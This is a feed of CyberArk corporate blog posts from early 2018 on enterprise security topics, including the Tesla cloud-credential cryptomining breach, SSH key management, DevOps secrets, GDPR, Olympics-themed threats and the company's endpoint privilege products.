Where Rubber Meets the Road: Exposed Credentials in DevOps Tools Facilitate Cryptocurrency Mining https://www.cyberark.com/blog/rubber-meets-road-exposed-credentials-cloud-facilitate-cryptocurrency-mining/ Fri, 02 Mar 2018 16:37:03 +0000 https://www.cyberark.com/?p=22860/

Cloud and DevOps enable powerful, transformational advances across many businesses – from finance to manufacturing. But, what happens when a cyber attacker gets a hold of the access keys to the cloud account of a leading automobile manufacturer? Well, as learned in the recently reported breach at Tesla, the attackers exploited access to mine for cryptocurrency!

Reportedly, attackers discovered an unprotected DevOps tool belonging to Telsa. In this case it was a Kubernetes console that exposed AWS Access Keys. With these credentials, the attackers gained access to Telsa’s cloud environment. Once the attackers had the AWS Access keys, they were able to set up scripts to mine for cryptocurrency using the stolen compute resources.

Cryptocurrency mining using a hacked cloud account is becoming increasingly popular with hackers, especially given the recent increases in cryptocurrency values – it’s viewed as an easy route to monetize an attack. But this type of attack could have been worse. Once the attackers have the access keys, they can access other cloud resources, copy sensitive data, and do other damage to the enterprise’s cloud workloads.

Unprotected DevOps Tools – A Growing Vulnerability

This breach serves as a powerful warning to prioritize management of the access and credentials for the DevOps and automation tools used throughout the CI/CD pipeline.

Three Key Takeaways from the Tesla Breach

  1. Protect your cloud credentials and access keys. Cloud credentials, such as AWS Access Keys, are very powerful. In the wrong hands they give unauthorized access to compute resources and sensitive data. Essentially, the access keys and cloud management console really do hold the keys to the cloud kingdom.
  2. Proactively check if your cloud resources are being used for cryptocurrency mining. Because cloud compute resources are powerful and can be assigned dynamically, they are attractive targets for cryptocurrency miners. Cryptocurrency mining enables attackers to readily monetize their attack, at the enterprises’ expense (The attacker gets the cryptocurrency, and the enterprise pays the compute bill). As with other attacks, it may be a while before the enterprise detects the problem.
  3. Protect the admin consoles for all your DevOps and other automation tools. DevOps tools admin consoles can be potential vulnerabilities and act as entry points that need to be protected. With DevOps pipelines comprising multiple tools there are multiple potential entry points.

Organizations Must Proactively Secure DevOps and Cloud Environments

Whether your enterprise fully embraces DevOps or is just starting to adopt automation and DevOps, it is clear that the credentials for the admin consoles for DevOps and automation tools need to be secured and managed. The potential risks of cryptocurrency mining can be greatly reduced by maintaining basic cyber hygiene best practices to address and secure DevOps and cloud environments. Risk management for CI/CD pipelines and the cloud needs to be prioritized with the same, consistent policy enforcement that organizations use on-premises.

Securing the admin consoles for an organization’s DevOps and automation tools and cloud management consoles are basic first steps.

As a next step, consider attending a CyberArk DevOps workshop, talking to one of our DevOps experts, scheduling a demo, or start using CyberArk Conjur open source edition by following the “Simple Steps to Protect Your DevOps Tools from Cryptocurrency Miners” outlined in the technical blog on Conjur.org.

]]>
Survey Says Organizational Inertia Weakens Cyber Security Defenses https://www.cyberark.com/blog/survey-says-organizational-inertia-weakens-cyber-security-defenses/ Wed, 28 Feb 2018 13:00:33 +0000 https://www.cyberark.com/?p=22775/

Inertia, by definition, indicates resistance to speed, direction or motion. It can creep in over a period of time and become an established behavior in an organization. The CyberArk Global Advanced Threat Landscape Report 2018 found specific examples of cyber security inertia which, if not addressed, could hinder an organization’s ability to detect and contain threats that break through the perimeter.

A key finding of our 2018 report is that nearly half (46 percent) of organizations rarely make substantial changes to security strategy—even after being hit by a cyber attack. This represents a failure to learn from past incidents that puts sensitive data, infrastructure and assets at risk; a consequence that respondents recognized, with the same proportion—46 percent—saying their organization can’t always prevent attackers from breaching internal networks.

Another worrying discovery is that more than a third (36 percent) of organizations store usernames and passwords for privileged user accounts in Word or Excel documents on company PCs. These privileged credentials deliver fast-track access to networks and systems across the enterprise, making them a tempting target for attackers.

Speaking of raising the odds of an attack succeeding, we were surprised to find a growing number of organizations grant users administrative rights on their endpoint devices. This year, the report found that, on average, 87 percent of users are allowed these rights, a 25 percent jump versus our 2016 study. With advanced malware attacks over the past year, such as WannaCry and NotPetya, greater prioritization around blocking credential theft is necessary to prevent attackers from gaining access to the network and initiating lateral movement.

The threat landscape is dynamic, so inertia will ultimately lead to serious consequences. Consider this finding: Half (50 percent) admit that their customers’ sensitive private data is at risk because security controls don’t exceed the legally required basics. In light of the EU’s General Data Protection Regulation (GDPR) and similar legislation in other countries around the world, the need for robust, organization-wide security and data integrity practices has never been more prominent.

Removing inertia requires businesses to build and sustain a pervasive culture of cyber security that is driven by executives and the board. This should be a top-down initiative supported by clearly defined and communicated security strategies and actively executed with participation by employees company-wide.

Read more by downloading the full report here.

]]>
Five Things to Know about Cryptomining https://www.cyberark.com/blog/five-things-know-cryptomining/ Mon, 26 Feb 2018 17:07:08 +0000 https://www.cyberark.com/?p=22716/

Does it feel like your computer is running (or rather, crawling) slowly? You may be a victim of cryptomining—cyber criminals’ latest tool du jour. A couple of weeks ago, Reuters reported that thousands of websites, including ones run by U.S. and UK government agencies, were infected with cryptomining code. As we covered recently, many enterprising hackers also use this attack method to take advantage of the surge in online viewing activity around high-profile events such as the 2018 Winter Olympics.

Cryptomining may be the latest cyber attack rising, but what is it, exactly? According to MIT Technology Review, “Mining is a computationally intensive process that computers comprising a cryptocurrency network complete to verify the transaction record, called the blockchain, and receive digital coins in return.” In other words, “miners” work to solve complex mathematical problems in order to generate income in the form of digital currency, such as Bitcoin, Ethereum, Monero and others. This mining process requires serious hardware and significant CPU resources to “create” cryptocurrency.

To put this in perspective, a representative from Hitaveita Sudurnesja, an energy company in Iceland, said he expected “Iceland’s virtual currency mining to double its energy consumption to about 100 megawatts this year.” This is significantly more than what is used by the country’s entire population of 340,000.

Five Things to Know about Cryptomining:

  1. How Cryptomining Malware is Executed: Malicious cryptomining typically spreads in one of two ways. The first approach is by malware, delivered via a malicious email attachment or link. Researchers found that 23% of organizations globally were affected by Cryptomining malware, specifically the Coinhive variant, during January 2018. The second approach is to infect third-party content providers used by high trafficked sites. For example, an advertising provider might be targeted because of its access to thousands of websites reaching millions of people. This method can deliver more substantial return for the attacker. When users visit the site, they unknowingly “donate” their computing processing power to the attacker while they remain on the page. These attacks don’t require, or spread, malware on the user’s endpoint, so while users are impacted, they are not infected?
  2. How the Attacker Uses Power from your Device: By using crowd-sourced computing power, the attacker can scale up his/her mining efforts while eliminating the need to purchase expensive equipment as they “pan for digital gold.” The more collective power and speed the attacker can amass, the bigger the cryptocurrency payout.
  3. How to Tell If You’ve Been Hit: In most cases, you won’t find malware on your device, since this type of attack can run without it, so the only indication may be a visible slowdown in performance.
  4. Why It’s a Big Deal: What’s so concerning about this type of attack is that user computing power can now be hijacked by attackers just by visiting an infected site or a site that uses an infected third party.
  5. How to Protect Your Devices: Unfortunately, there is a little you and other end users can do but to monitor for abnormal utilization of browser process (not trivial for a non tech-savvy users) and higher than normal CPU usage. Instead, the responsibility should rely on those who own and maintain the website to routinely inspect all of their third-party providers.

Cyrptomining operations will continue and likely expand. We already see reports of mining of Monero using malware installed on internet-connected servers. Another reason to stay on top of vulnerabilities and the performance of your systems.

]]>
Four SSH Vulnerabilities You Should Not Ignore https://www.cyberark.com/blog/four-ssh-vulnerabilities-you-should-not-ignore/ Fri, 23 Feb 2018 05:00:52 +0000 https://www.cyberark.com/blog//

The Secure Shell (SSH) protocol was created in 1995 by a researcher from the University of Helsinki after a password-sniffing attack. SSH is the tool of choice for system admins and is used throughout traditional and virtual datacenter environments to enable secure remote access to Unix, Linux and sometimes Windows systems. You can think of the SSH key, which enables this remote access, as a “Swiss Army Knife” for IT teams in that it helps administrators and developers authenticate to systems, build authentication into systems and applications and encrypt the resulting traffic between its users and systems.

During the authentication process, these SSH keys often establish direct, privileged or root access to a variety of critical systems, effectively turning these cryptographic assets into privileged credentials. SSH keys are granted the same access as passwords, but when most people think about securing their privileged credentials, they forget about SSH keys. As a result, these keys can easily fall into the wrong hands and, instead of protecting access to important assets, these keys can become “virtual skeleton keys.” To make matters worse, when an attacker gains access to one privileged SSH key, she or he can access every SSH key stored on that machine and spider the entire company network, often gaining access to all company data. As few as five to 20 unique SSH keys can grant access to an entire enterprise through transitive SSH key trust, providing attackers with privileged access to the organization’s most sensitive systems and data.

Four SSH vulnerabilities you should not ignore:

  1.  SSH Key Tracking Troubles. It’s not uncommon for a typical large enterprise with 10,000+ servers to have more than one million SSH keys – making it incredibly difficult, if not impossible, to find and manage each key. Organizations typically accumulate large numbers of SSH keys because end users can create new SSH keys (credentials) or even duplicate them without oversight, unlike certificates or passwords. Once a large number of SSH keys are built up over time, an organization could, for example, easily lose track of these credentials when development servers are migrated into production environments (assuming the development environment credentials are not scrubbed) or when employees leave the company and their keys are not changed. The result? SSH keys left unaccounted for can provide attackers with long-term privileged access to corporate resources. If attackers gain access to a key that is never revoked or rotated, the attackers could have a permanent network entry point and impersonate the user that the SSH key originally belonged to.
  2.  When it Comes to SSH Keys, Sharing Isn’t Caring. For the sake of efficiency, SSH keys are often shared or replicated across a common group of employees or servers and infrastructure components. As noted above, as a result of SSH key duplication, as few as five to 20 unique keys can grant access to all machines throughout an enterprise. This approach may make IT teams’ jobs easier in the short-term, but it also makes attackers’ lives easier in the long-term. SSH key duplication creates complicated, many-to-many private public key mappings that significantly reduce security because it is difficult to rotate and revoke a single key without breaking untold other SSH key relationships that share the same key fingerprint. SSH key sharing is also dangerous because it reduces auditability and nonrepudiation.
  3. Static SSH Keys, Because “Ain’t Nobody Got Time for Rotation!” It’s easy to see how rotating one million plus SSH keys would be a logistical nightmare. Many IT administrators and security professionals rarely change and re-distribute keys for fear that a critical component or employee may be forgotten (which could mean anything from a simple inconvenience for a single employee to a major company-wide system outage). These factors typically result in a surge of static SSH keys, opening the door for attackers to compromise an unchanged key, use it to move laterally through the enterprise and gain permanent, unauthorized access to sensitive data and assets.
  4. Embedded SSH Keys – The Ones No One Wants to Mess With. SSH keys are frequently embedded within applications or scripts. Administrators are often fearful of changing them as they do not understand the code the keys are embedded in or are strongly discouraged from rotating them because of the level of coordination required to prevent system outages. As a result, static SSH keys embedded in applications, code and scripts can lead to persistent backdoors for attackers.

SSH keys can present a tremendous opportunity for hackers to gain privileged access to networks, stay connected, impersonate legitimate users, hide their activity with encryption and move freely. To learn about SSH key challenges and best practices for mitigating associated risks while improving your overall security posture, visit our website. And to learn more about our comprehensive secrets management tool to help secure SSH keys, credentials and other secrets used by applications and machines, check out this blog post.

SSH Key Graphic_V2 short

 

Editor’s Note: This article has been updated. It was originally published April, 2016.

]]>
How Secure is Your Continuous DevOps Pipeline? https://www.cyberark.com/blog/pwc-cyberark-continuous-devops-pipeline-continuously-secure/ Wed, 21 Feb 2018 20:36:46 +0000 https://www.cyberark.com/?p=22617/

Code fast, beat the competition to market and build market share. This is the value of DevOps.  Businesses around the world fuse software development, integration, test and operations practices to accelerate digital transformation and enhance business performance and agility. In fact, research shows that agile firms grow revenue 37 percent faster and generate revenues 30 percent higher than firms that have not embraced DevOps[i].

But, are these organizations missing a critical step?

Many developer and operations teams have “settled their differences” to leverage countless containers, applications and virtual machines in order to move and produce at unprecedented scale and speed.  Now, some organizations struggle to answer critical security-related questions about these new processes, such as:

  • Who—or what—has access to these virtual machines and applications?
  • Where are the secrets and credentials stored?
  • Is our continuous CI/CD pipeline continuously secure?

DevOps Introduces New Security Challenges

As we’ve explored in previous posts, the DevOps pipeline comprises a diverse collection of development, integration, testing and deployment tools, people and resources. The sheer scale and diversity of this ecosystem can make it difficult to secure for three key reasons:

  • Each development and test tool, configuration management platform and service orchestration solution has its own privileged credentials, which typically are separately maintained and administered using different systems, creating islands of security.
  • Secrets (passwords, SSH keys, API keys, etc.) used to authenticate exchanges and encrypt transactions are scattered across machines and applications, making them nearly impossible to track and manage.
  • Developers often hard code secrets into executables, leaving the business vulnerable to malicious attacks and exposure of confidential data, from attackers with stolen secrets.

The proliferation of containers has exacerbated these security challenges by creating “secrets sprawl.” Consider that in any given enterprise, hundreds of VMs can easily give way to thousands or hundreds of thousands of containers—each with its own security attributes.

Secrets Management at the Speed of DevOps

PwC has deep experience in security and DevOps and recently released a new white paper focused on securing DevOps environments.  PWC’s whitepaper illustrates its strong capabilities in working with enterprise clients to identify, design and deploy improved processes and technical solutions for DevOps that are also inclusive of a critical element: secrets management. This whitepaper introduces PwC’s High Velocity IT solution, which is underpinned by the CyberArk Conjur secrets management solution and helps organizations reduce risk without impacting velocity. The joint solution addresses the full spectrum of tasks and activities needed to convert ideas into useful technology-centric functions. For example, outcomes could include lower delivery costs, fewer errors in production, improved agility and metrics-based continuous improvement.

CyberArk + PwC = High Velocity IT

CyberArk has an extensive business relationship with PwC—the global consulting firm has deep experience architecting and implementing CyberArk solutions. In fact, CyberArk named PwC its Global Systems Integrator of the Year Americas in 2017. PwC’s experience in working with CyberArk empowers IT organizations to efficiently manage access and authorization privileges across the DevOps pipeline, helping security teams mitigate risks and improve compliance without hindering workflows. Together, CyberArk and PwC can help organizations build a secure and agile DevOps pipeline to achieve high velocity IT.

For additional best practices from PwC and CyberArk on securing your DevOps pipeline and achieving compliance without adding roadblocks to DevOps workflows, register for our joint February 22 webinar and download the free white paper.

 [i] How business can survive and thrive in turbulent times. The Economist Intelligence Unit Ltd.

]]>
When It Comes to GDPR, Don’t Wait and See https://www.cyberark.com/blog/comes-gdpr-dont-wait-see/ Mon, 19 Feb 2018 14:25:28 +0000 https://www.cyberark.com/?p=22478/

The General Data Protection Regulation (GDPR) goes into effect in just three short months. Though it’s been a long time coming, industry reports estimate that more than 50 percent of companies affected by the GDPR will not be in full compliance with its data protection requirements by the May 25 deadline.

Many of these organizations have chosen to take a “wait and see” approach, observing how the rules will actually be enforced and who will be found in violation before they make widespread changes to their security programs. This is a misguided strategy that could result in crippling fines—up to four percent of company turnover.

Imagine, for example, if the recent Uber breach would have occurred after the GDPR went into effect. Post-breach analysis of the breach revealed a significant lack of security controls necessary to prove compliance with the regulation. This case likely would have resulted in a massive, multi-million dollar fine as it involved personal data of nearly 60 million customers and drivers and went unreported within the GDPR-mandated 72-hour timeframe.

Operational control over who has access to personal data is at the heart of complying with the GDPR. Essential to gaining that operational control is strong privileged account management. Time is indeed running short, but there is still time to address the gaps and protect your organization from financial penalties and liability by taking advantage of the tools you already have in place. Our at-a-glance matrix outlines how CyberArk customers can leverage components of the CyberArk Privileged Account Security Solution to address several key, required controls.

For other helpful checklists, solution briefs, eBooks, advisories and more, check out our library of free GDPR resources.

]]>
Who’s A CRN Channel Chief Three Years Running? CyberArk’s Scott Whitehouse https://www.cyberark.com/blog/whos-crn-channel-chief-three-years-running-cyberarks-scott-whitehouse/ Fri, 16 Feb 2018 18:51:12 +0000 https://www.cyberark.com/?p=22473/

CyberArk continues to invest in the success of its channel partners, enabling them to capitalize on new business opportunities based on the industry’s most comprehensive privileged account security solution. Scott Whitehouse leads CyberArk’s channel initiatives, and he was recently named a 2018 CRN Channel Chief for the third consecutive year!

CRN’s editorial staff selects honorees based on professional achievements, standing in the industry, dedication to the channel partner community and strategies for driving future growth and innovation.

As the Vice President of Channels and Alliances at CyberArk, Scott is responsible for field relationships with CyberArk channel partners and advisory/integration firms. His team collaborates with the Big 4 advisory firms, global systems integrators, managed service providers and value-added-resellers to launch and maintain innovative privileged account security programs that address advanced cyber threats and compliance and audit regulations.

Scott is a driving force in building strong channel relationships and delivering differentiated solutions to the channel.  Solidifying his spot on this prestigious list, Scott led several key initiatives over the past year, including:

  • Growing partnerships with key Big 4 advisory firms and driving opportunities through new and expanded technology integrations with vendors including ForeScout, SailPoint, Okta, Qualys, RSA, ServiceNow, Puppet, Chef and Ansible.
  • Generating cloud and DevOps business opportunities by increasing awareness across the channel of new CyberArk capabilities that enable customers to protect against advanced security threats by protecting privileged accounts, credentials and secrets in dynamic cloud environments and DevOps workflows.

The full list of 2018 Channel Chiefs is available here. If you get a chance, be sure to ask Scott about The Phoenix Project and why backcountry heli-skiing is on his bucket list!

]]>
DevOps Security Watch: Three Trends to Track in 2018 https://www.cyberark.com/blog/devops-security-watch-three-trends-track-2018/ Wed, 14 Feb 2018 16:31:02 +0000 https://www.cyberark.com/?p=22316/

In recent weeks, I’ve been on the road traveling with colleagues and visiting with customers and prospects. Collectively, we’ve had interesting conversations about the new and reoccurring risks companies face, and the tough job many face at they manage their security portfolio. I thought I’d share some of my observations and details about what I have my eye on in 2018.

Observation: The Uber breach was just a peek behind the curtain of what’s to come

The Uber breach rocked headlines in 2017, but it shouldn’t have been so surprising. Data of 57 million customers was ultimately exposed because Uber developers used an all too frequent workaround to manage credentials in a software repository, which gave hackers access to their privileged accounts. Those developers aren’t alone, and this is a peek behind the curtain of a common practice amongst developers.  There’s no simple way to securely collaborate across tools.

Organizations at large fail to make security easy for DevOps practitioners, and that causes friction and creates opportunity for failure. Developers aren’t—nor should they be expected to be—security practitioners.  They are responsible for features and functionality, not figuring out how to manage credential collaboration and security for those key assets. The Global Advanced Threat Landscape Report indicated that most organizations could not identify all the places and “workarounds” where credentials were stored, some of which are highly vulnerable. Also noted in the survey—73 percent of organizations had no strategy to address privilege account security for DevOps at all.

Unfortunately, we’ll continue to see breaches similar to Uber’s in 2018 and beyond. There’s an obvious failure in the developer user experience. Companies ask developers to manage security assets when it shouldn’t be a part of their core job function, nor do they have experience doing so. Automation will play a key role in making security more seamless, and that means making security part of developers’ native experience.

Another reason why the breach perhaps shouldn’t have been so surprising is because new research suggests that Uber might not be alone in its response at attempting to hide the breach from its customers. Part two of the Global Advanced Threat Landscape Report finds that 50 percent of organizations did not fully inform customers when their personal data was compromised in a cyber attack. Alarming, yes; surprising, maybe not so much. 

Observation: 2018 will reveal security is a full-time job on the DevOps team, and there will be a new talent gap in DevSecOps

Organizations are turning to DevOps workflows to achieve transformative velocity and innovation, but they’re not prepared or staffed to manage the security of these environments. We’ll see a critical talent gap of DevSecOps practitioners as business leaders increasingly prioritize cyber security.

Many organizations simply task the same DevOps practitioners—often with no security experience—to protect these environments, in addition to the numerous other responsibilities they have to deliver. That’s no longer sufficient, especially considering the increasing threat surface in DevOps workflows and the associated risks in managing the scripts, platforms and systems used in automated workflows.

DevSecOps practitioners are in high demand. They’ll be even harder to find in 2018 as organizations realize that they have the right tools but not necessarily the right people to manage them.  Security will become a full-time job focused on DevOps workflows, and there will be few practitioners to fill that role available in the market.

Observation: Least privilege will get a facelift in the world of DevOps in 2018

Organizations are starting to understand that “identity” hasn’t been completely addressed in the full enterprise stack. There’s no common standard for machine identity, access control and management, or audit across a multiplicity of platform components. Organizations are only as safe as their weakest link.  The weak link could be a VM, container or any of the dozens of platform layers that now exist across the network. As these matrixes expand, they become substantially harder to control.

As a result, there needs to be a stronger definition of machine identity in highly automated systems that carry increasingly sensitive data. I predict that we’ll start to see a meaningful application of the concepts formerly used in human access management applied to machines. By forcing the DevOps team to consider and apply “Who are you, what are you, what are you asking for?” to machines—including the DevOps environment—organizations can follow security best practices and limit what machines are doing, without compromising operations. This will enable true accountability for the security posture of DevOps environments and the process of continuous delivery of least privilege in DevSecOps can become a reality.

Ultimately, it’s important to understand that DevOps doesn’t have a full picture view of security. They primarily think about software vulnerability and patch management as the “scope of their security function.” To test this, you can ask them which security tools they use.  They will likely say, “Terraform, GitHub, Ansible, etc.” They are only looking at patches and vulnerabilities. They aren’t looking at access control and privilege associated with their access to tier zero assets. They aren’t thinking about secrets management.

Sure, DevOps made HeartBleed easier, but it didn’t prevent the Uber breach because the “security tool” that was ultimately compromised was the source of the breach. The rest of the toolchain has the same problem. Think about it: I phish one DevOps tools, and I own your systems.

It’s time to either bring in the security teams to help secure your toolchain or start thinking like an attacker.

]]>
2018 Winter Olympics: Citius, Altius, Fortius, Cyber Attacks? https://www.cyberark.com/blog/2018-winter-olympics-citius-altius-fortius-cyber-attacks/ Mon, 12 Feb 2018 14:55:46 +0000 https://www.cyberark.com/?p=22253/

Only days into the Winter Olympics and reports of cyber attacks are making headlines. Officials have confirmed that a cyber attack is to blame for an internet and Wi-Fi shutdown during the opening ceremony.

Noncritical systems were impacted – including the official Olympics website, which according to reports, went offline when organizers shut down servers to address the attack. Wi-Fi service also stopped working.

This follows the Department of Homeland Security’s recent warning that the 2018 Winter Olympics will be a hotbed of cybercriminal activity. While the warning was extended to those in attendance, you don’t have to be sitting in the stands to become an unwitting target.

Whether they’re part of a criminal syndicate or part of a nation-state attack group, cyber attackers love to use high-profile public events as a cover for their malicious activity. Even the most security conscious person can let their guard down when they’re caught up in the spectacle and excitement of something like the Olympics.

With that in mind, here are a few techniques and approaches that we believe attackers will use during the Olympics, both to target spectators on-site and those watching and reading about the Olympics at home or from the office.

Cryptomining

Cryptomining attacks are quickly replacing ransomware as the attacks du jour. Attackers will infect websites that are commonly used to view Olympic activity, stream events or provide news on what’s happening at the games.

By visiting an infected site, users unwittingly donate their computing power resource to mine cryptocurrency on behalf of the attacker – all without users knowing they were part of the process.
These attacks don’t require malware to run on the user’s endpoint. The only indication of the attack may be that your computer runs slower due to loss of computing power.

We’ll dig into crypto-attacks more in a subsequent blog post.
High Value Targets:  Olympic viewers back home or in the office

Spear Phishing Campaigns

This is one of the most common methods attackers use to gain a foothold on an endpoint or in an organization. Attackers use peoples’ information to specifically target them with a malicious email, in hopes that they’ll click a link and unleash the payload it’s carrying.

There are already reports that attackers have been targeting Olympic officials for months. Whether you’re watching the games from home or attending, be wary of any email that contains links or attachments to information about events, times and websites to watch the games. Vigilance is the best defense against phishing attacks.
High Value TargetsOlympic athletes, Olympic officials, country delegations and government representatives, viewers/fans

IoT and Mobile Payment Attacks

Mobile payments and IoT promises to be a big part of the 2018 Winter Olympics. Internet-connected devices have been a favorite target of attackers of the past year, primarily because of the incredibly poor security of most IoT devices. We can expect attackers to test device defenses used during the Olympics – whether it’s cameras, wearables or any other device that will be gathering data on athletes, attendees and officials.

While mobile payments make life much easier for the consumer, the platforms have historically had poor security and represent a real threat to consumer security. Some of the more prevalent mobile payment attacks include spoofed mobile wallets, or malware on the phone itself, which will collect all of your data, passwords and other sensitive information.
High Value Targets:  Fans/attendees, Olympic athletes, Olympic officials

Public Wi-Fi-Related Attacks

Public Wi-Fi-related attacks are an oldie and attacker favorite – something that has manifested in previous Olympics (or any public event where free Wi-Fi is provided).

These types of attacks are incredibly common – free Wi-Fi is typically poorly secured. It’s fairly easy for attackers to use Wi-Fi sniffing software to ferret out the data transmitted over the network. This becomes worrisome when you use pubic Wi-Fi for sensitive transactions like banking or even entering passwords to websites.

If you’re at the games, be extra careful about what network you’re connecting to and try to avoid accessing websites where you need to enter your passwords, sensitive information (like SS numbers) or banking/financial websites.

In addition to these recommendations, visitors should also consider using a mobile hotspot for Wi-Fi access.
High Value Targets: Olympic athletes, fans in attendance

 

 

]]>
Feels like a Cyber Security Groundhog’s Day https://www.cyberark.com/blog/feels-like-cyber-security-groundhogs-day/ Fri, 09 Feb 2018 14:44:14 +0000 https://www.cyberark.com/?p=22167/

While nobody has a crystal ball for what’s coming this year, I think we can all agree tough security lessons were learned in 2017. From Yahoo indicating that every one of its 3 Billion email accounts (that’s a B) was exposed in a breach to some pretty serious hacking tools believed to have been developed by the NSA. Additionally, we saw the WannaCry, NotPeyta and BadRabbit ransomwares making everyone aware of how important it is to update your operating system and key applications along with a strategy that mitigates risks from a diverse, targeted and motivated set of attackers. In short, the guidance here would not be much different from the last few years on what to do to help to prevent these attacks. This should give us a sense of pause – are we in some sort of a Cyber Security Groundhog’s Day where we keep repeating the same old thing?

How much wood can a Cyber wood chuck, chuck if a….

So at the risk of sounding like a broken record, I want to restate something that you have heard from CyberArk. Privilege is an endpoint problem, and it is solvable. Privileged account security is something that should be properly handled alongside other security hardening and defense-in-depth strategies. We have been saying this for a long time, but it’s great to see other vendors make this argument too. The analyst community also notes this as a key tenant for a defensive strategy.

Along with privileged account security, and this means effortlessly implementing the principles of Least Privilege (coincidently in the top 5 Critical Cyber Controls advocated by the Center for Internet Security to reduce the attack surface), we see two other critical areas we featured in our recent release: application control and credential theft protections.

Application control is something we have discussed previously. Coupling this with Ransomware policy automation, customers that leverage Endpoint Privilege Manager are able to quickly insulate their environments from one of the biggest plagues of 2017 in very aware ransomware (say that 10 times fast). While some look at app control as passé, the reality is that there is more than a “give and take” that happens when properly implemented. I like to look at it as “help me to help you.” CyberArk has many large customers leveraging this capability across multi-national organizations with different levels of control that enable their respective businesses to operate at peak efficiencies. The result: instead of chasing down instability issues, CyberArk Endpoint Privilege Manager customers can focus more energies on the important matters of the business.

Now available to all deployments of Endpoint Privilege Manager is CyberArk Application Risk Analysis (ARA) service. This service enables IT security analysts to make timely decisions around policy for unknown applications that enter their environments. ARA combines machine learning, to identify risky applications, with several layers of malware identification to arrive at a risk score for an unknown application. The key benefit is to enable unknown applications to be properly handled by policy.

Watch this video to see CyberArk Application Risk Analysis in action:

 

 

“Do you ever have déjà vu, Mrs. Lancaster?

As it’s been said many times by analysts and the industry as a whole, target credentials for a privileged or administrative user to achieve their objectives. At CyberArk this hits home since controlling privilege is the name of the game. Having preventative measures to keep the bad guys out (i.e. not getting on the endpoint in the first place) is really an arms race that several Cyber Security companies embark upon. Eventually, the bad guys will get on your endpoint, and most agree inevitably, thus the change in tone and posture to not simply focus on prevention but also detection.

Once inside, it’s what happens next that matters most. This usually means attacks on the environment directly as the user (if say, for example, they are operating with administrative permissions, which our application control does a great job interrupting) or in many cases now a days, stealing an admin credential or residual privilege on the endpoint from a prior login.

“Thinking like an attacker” enables CyberArk Endpoint Privilege Manager can help when the bad guys get around your NGAV or EDR solution to provide a means to contain their activities to the endpoint via credential theft protection. CyberArk credential theft protection leads the industry with the most diverse coverage of theft detections and blocking of every Windows OS credentials store, every browser-based credential store and also includes local AWS secret keys residing on the endpoint. By keeping the bad guys from stealing a privileged credential, this often means that they are unable to escalate privilege to pivot onto more sensitive systems. In many cases, this sufficiently deters or outright breaks the attack chain on this attacker allowing your incident response teams to clean up the infiltration on the endpoint.

To help ensure the outcomes are as described, Endpoint Privilege Manager ships with protections across Local Security Authority Subsystem Service (LSASS), Security Account Manager (SAM), Domain Credentials Cache (msvcachedv2), the Local Security Authority (LSA), Safe Mode turning off Microsoft’s Virtual Secure Module (VSM), Microsoft Vault as well as Internet Explorer, Chrome and Firefox browser threats that aim to steal stored credentials. Various remote access tools such as WinSCP and mRemoteNG are protected as well since they retain local cached credentials. This lateral movement protection helps to keep your organization safe from Golden Ticket and Golden SAML attacks.

Keep on trolling

With 2018 looking like we are heading toward another Cyber Security Groundhog’s day, don’t let yourself repeat last year and cause grave impact to your systems. Look to control privilege on your endpoints and take proactive steps to control applications and the threat of ransomware. Take CyberArk ARA out for a spin all while keeping the privileged credentials you do use, safe. Now that’s a happy ending I think we can all agree on.

To help get you on the right path, contact us today to get a DNA Scan of your environment and see where privilege is hiding.

]]>
What Super Bowl LII Ads Can Teach You about Privileged Account Security https://www.cyberark.com/blog/super-bowl-lii-ads-can-teach-privileged-account-security/ Mon, 05 Feb 2018 18:08:34 +0000 https://www.cyberark.com/?p=21946/

It is the day after Super Bowl LII, and sadly, Patriots fans did not wake up savoring the good feeling of their sixth Super Bowl win with Tom Brady. In our household, there is now a temporary ban on sports radio until talk of this Super Bowl dies down over the airwaves.

Although the game was a big disappointment for Patriots players and fans alike, this year’s Super Bowl ads delivered some fun and entertainment. As I sip my morning coffee, I’m recalling some of my favorite and least favorite ads of Super Bowl LII and drawing parallels between them and cyber security—privileged account security in particular.

So let’s start with (arguably) my least favorite ads of this Super Bowl. One is the Intuit TurboTax ads which featured a poorly animated creature hiding under the bed. The other ad featured a Casper-like ghost hiding in the attic which played much better. The main message of both ads was that U.S. tax payers should not fear or delay filing their taxes. Instead, they should get started now with the friendly assistance of TurboTax’s experts.

And how might this Super Bowl ad relate to privileged account security you ask? Security teams also face hard deadlines and often feel overwhelmed trying “get it all done.” Some organizations delay moving forward with a comprehensive privileged account security program because they don’t know where to begin. But just like April 15 and the “tax man who cometh,” infrastructure and applications will get breached, so it’s essential to proactively mitigate the risks associated with privileged accounts and credentials—whether the risks comes from human error, malicious insiders, or external attackers.

Security teams don’t have to wait until the proverbial April 14 to get started; a good resource to consider is CyberArk’s CISO View report titled, “Rapid Risk Reduction: A 30-Day Sprint to Protect Privileged Credentials.” This report provides an inside look at the lessons learned from several high-profile data breaches and offers a proven framework for an intensive sprint of approximately 30 days to implement a set of controls around privileged credentials.

But what about the best Super Bowl LII ads? Can we learn anything about privileged account security from these as well? But of course!  My top three favorite ads were Fire and Ice for Doritos and Mt. Dew, Amazon’s Alexa gets some new voices, and the NFL ad featuring Eli Manning and Odell Beckham’s “Dirty Dancing.”  Although the Alexa ad has some obvious cyber security angles (who hasn’t read stories about the “what ifs” of your smart home devices getting hacked), I am going to explore the privileged account security connections of the Manning and Beckham ad instead.

Now the connection to privileged account security for this ad is a tad more subtle than the TurboTax ad. This ad made me think about the organizational issues that sometimes get in the way of companies moving forward with any type of cyber security program, whether privileged account security-related or otherwise. Instead of the harmonious flow of Beckham and Manning and the rest of the team dancing in the background, organizations often let discord between the different parts of the company (security, IT operations, DevOps and developers) get in the way of tackling the security risks that they know are out there and need to get addressed. The consequences of not addressing these risks is, of course, far more serious than a missed touchdown pass or the sack that sealed the Patriot’s defeat at the end of the game.

So, what was your favorite Super Bowl LII ad and why? Let us know via Twitter @CyberArk or @kcmestre.

]]>
New Research Paper: Pass-the-Hash Detection https://www.cyberark.com/blog/new-research-paper-pass-hash-detection/ Fri, 02 Feb 2018 22:19:56 +0000 https://www.cyberark.com/?p=21906/

CyberArk Labs recently published a preview of research on our Threat Research Blog exploring ways to detect Pass-the-Hash (PtH) attacks using the Windows Event Viewer. As follow-up to the highly-referenced post, the Labs team has published a technical research paper with additional details on the technique. The new paper is available via downloaded here.

